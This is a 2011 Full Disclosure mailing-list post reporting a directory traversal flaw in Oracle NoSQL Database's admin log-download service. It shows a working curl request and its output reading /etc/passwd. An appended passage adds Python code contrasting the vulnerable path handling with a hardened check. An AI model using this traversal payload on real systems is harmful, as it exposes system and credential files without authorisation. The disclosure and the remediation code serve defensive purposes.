Full Disclosure mailing list archives
Oracle NoSQL Directory Traversal
From: Buherátor <buherator () gmail com>
Date: Sat, 5 Nov 2011 18:58:20 +0100
Hi List,

I don't know if this is worth anything, because the manual says:

"Oracle NoSQL Database is intended to be installed in a secure location where physical and network access to the store is restricted to trusted users. For this reason, at this time Oracle NoSQL Database's security model is designed to prevent accidental access to the data. It is not designed to prevent malicious access or denial-of-service attacks."

Anyway, here is the deal:

+++
$ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd
* About to connect() to 127.0.0.1 port 5001 (#0)
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)
> GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
> User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
> Host: 127.0.0.1:5001
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Content-Length: 1668
< Content-Disposition: attachment; filename="../../../../../../../../../../../../../../../etc/passwd"
< Server: Jetty(7.4.0.v20110414)
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
[...]
+++

Software: Oracle NoSQL Database 11gR2.1.1.100

Regards,
Buherator

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
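The fix a log-download handler needs for the `log` parameter shown above, added here as an illustration (this is not Oracle's code and not part of the original post): accept only a bare file name, canonicalise it, and confirm it still resolves inside the log directory. Directory layout, file names and the helper names are hypothetical.

```python
import os
import tempfile
from typing import Optional


def vulnerable_log_path(log_dir: str, log: str) -> str:
    """The pattern the advisory demonstrates: the parameter is joined onto the
    log directory unchecked, so '../' segments escape it (and an absolute
    path is simply adopted by os.path.join)."""
    return os.path.join(log_dir, log)


def safe_log_path(log_dir: str, log: str) -> Optional[str]:
    """Canonical path of a log file inside log_dir, or None if not servable.
    Two independent defences: bare-file-name check, then containment of the
    symlink-resolved path inside the resolved log directory."""
    if not log or log in (".", "..") or log != os.path.basename(log):
        return None
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, log))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> dict:
    """Run both helpers against a constructed (hypothetical) log directory and
    return the outcomes so they can be checked."""
    log_dir = tempfile.mkdtemp(prefix="kvlogs-")
    outside = tempfile.mkdtemp(prefix="outside-")
    secret = os.path.join(outside, "secret.txt")
    with open(os.path.join(log_dir, "admin.log"), "w") as f:
        f.write("constructed admin log\n")
    with open(secret, "w") as f:
        f.write("constructed file that must never be served\n")
    # Symlink inside the log dir pointing outside it: defeats prefix-only checks.
    os.symlink(secret, os.path.join(log_dir, "leak.log"))
    traversal = "../" * 15 + "etc/passwd"  # the payload shape from the advisory
    return {
        "vuln_traversal": os.path.normpath(vulnerable_log_path(log_dir, traversal)),
        "vuln_absolute": vulnerable_log_path(log_dir, "/etc/passwd"),
        "safe_plain": safe_log_path(log_dir, "admin.log")
        == os.path.realpath(os.path.join(log_dir, "admin.log")),
        "safe_traversal": safe_log_path(log_dir, traversal),
        "safe_absolute": safe_log_path(log_dir, "/etc/passwd"),
        "safe_symlink_out": safe_log_path(log_dir, "leak.log"),
        "safe_missing": safe_log_path(log_dir, "nope.log"),
    }
```

The containment check must run on the `realpath` result, not on the raw join, otherwise a symlink dropped into the log directory bypasses a plain prefix comparison.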
Current thread:
- Oracle NoSQL Directory Traversal Buherátor (Nov 05)
- Re: Oracle NoSQL Directory Traversal Valdis . Kletnieks (Nov 05)
- Re: Oracle NoSQL Directory Traversal Ed Carp (Nov 05)
- Re: Oracle NoSQL Directory Traversal Ryan Dewhurst (Nov 05)
- Re: Oracle NoSQL Directory Traversal Valdis . Kletnieks (Nov 05)
- Re: Oracle NoSQL Directory Traversal Ed Carp (Nov 05)
- Re: Oracle NoSQL Directory Traversal Valdis . Kletnieks (Nov 05)